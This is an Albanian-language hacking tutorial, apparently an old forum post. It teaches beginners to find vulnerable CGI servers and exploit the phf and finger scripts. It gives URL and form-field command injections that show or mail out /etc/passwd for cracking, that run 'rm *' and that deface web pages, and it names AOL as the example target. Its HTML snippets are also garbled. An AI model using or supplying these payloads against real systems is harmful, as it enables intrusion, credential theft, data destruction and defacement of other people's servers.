:evil: :evil: Ka disa teknika qe une i quaj "WEB BROWSER HACKING". Shume fillestare e dijne qe nuk mund te hapin folderin etc/passwd te nje serveri nepermjet browserit te pc tuaj, por une do ju
tregoj si te kopjoni nje file passwd po ne kete menyre.
Metoda e meposhte pershkruhet per hackerin e ri dhe mbulon PHF si direktori, por mund te
eksplorohet (nga ata pak me profesioniste) i gjithe cgi duke futur ketu nph-test-cgi apo
test-cgi. Tani... rehatohuni...mbeshtetuni dhe...lexoni!
Gjeja e pare eshte gjetja e nje viktime, nje terminali qe perdor cgi-bin/phf. Kjo mund te
behet me njekerkim ne Altavista.com. Kerkoni cgi-bin AND perl.exe ose cgi-bin AND phf.
a) Hacking me Finger
Te themi qe ju doni te futeni diku,
p.sh... AOL!!! Pas kesaj url-je do shtoni cgi-bin/finger. Nqs ky sherbim do jete funksional
do ju kerkohet e mri per t'u fingeruar. Ajo per te cilen do keni nevoje me pas eshte gjetja
e nje maileri ne faqe.
kethehuni tek faqja e finger dhe shkruani:
[email protected] ;/bin/mail
[email protected]
Kjo do ju dergopje ne emailin tuaj te gjithe filen passwd dhe ju pastaj me nge do mund bte
perdorni nje program si john.exe per ta crackuar.
b) Kerkese e zakonshme per cgi_bin/phf
Maeerin te njejtin skanar. Do shfaqern nje sere searchboxesh ne
www.aol.com/cgi-bin/phf.
(n.q.s nuk i kane hequr).
Kesaj Url-je shtojini
?Qalias=x%0a/bin/cat%20/etc/passwd.
Kjo do shfaqe ne browserin tuaj filen passwd te kriptuar qe ju duhet pestaj te krackoni (
n.q.s nuk jane te gjitha "*" ose "x").
c)Me scripte Cgi (mos merrni timin)
html>
h2>This is a form to go to Modify
form action = "http://www.aol.com/cgi-bin/doc.pl" method="get".>
input type="hidden" name="adresaime" value="
[email protected]".>
input type="text" name="input".>
input type="submit" value="send".>
/form.>
/body.>
Ky eshte nje formular ishjeshte qe kerkon nje mesazh per t'u derguar ne doc.pl. Ne doc.pl
si script duhet te figuroje shkrimi
sustem("/usr/lib/sendmail -t $adresaime
$tempfile")
Tani te bejme faqen tuaj.
html.>
h2.>Hack AOL
form action = "http://www.aol.com/cgi-bin/doc.pl" method = "get".>
input type="hidden" name="adresaime"
value=" ; rm * ;mail -s file
[email protected]
input type = "text" name="input".>
input type = "submit" value=:"getpasswd".>
/form.>
Pikepresjet tek vlerat e fshehura sherbejne si ndarje per komandat Unix qe zbatohen ne te
njejtin rresht. Sistemi therret perl.exe qe krijon nje shell Unix duke ju derguar juve ne
emailin tuaj filen passwd.
d) Editim faqesh nga browseri juaj
Ky fragment tregon se si te beni editimin e nje faqeje html cfaredo
I njejti skenar:
www.aol.com/cgi-bin/phf?Qalias=x%0a/bin/echo%20 "albhack.com"%20>>emerfile.com.html
Ne faqen nqe juzgjodhet kjo do shkruaje ALBHACK apo nje text tjeter te shenuar nga ju.
Autori nuk mban pergjegjesi per asnje lloj perdorimi te ketij materiali qe u paraqit per
qellime teresisht informative.
Web Browser Hacking
Modė Lineare
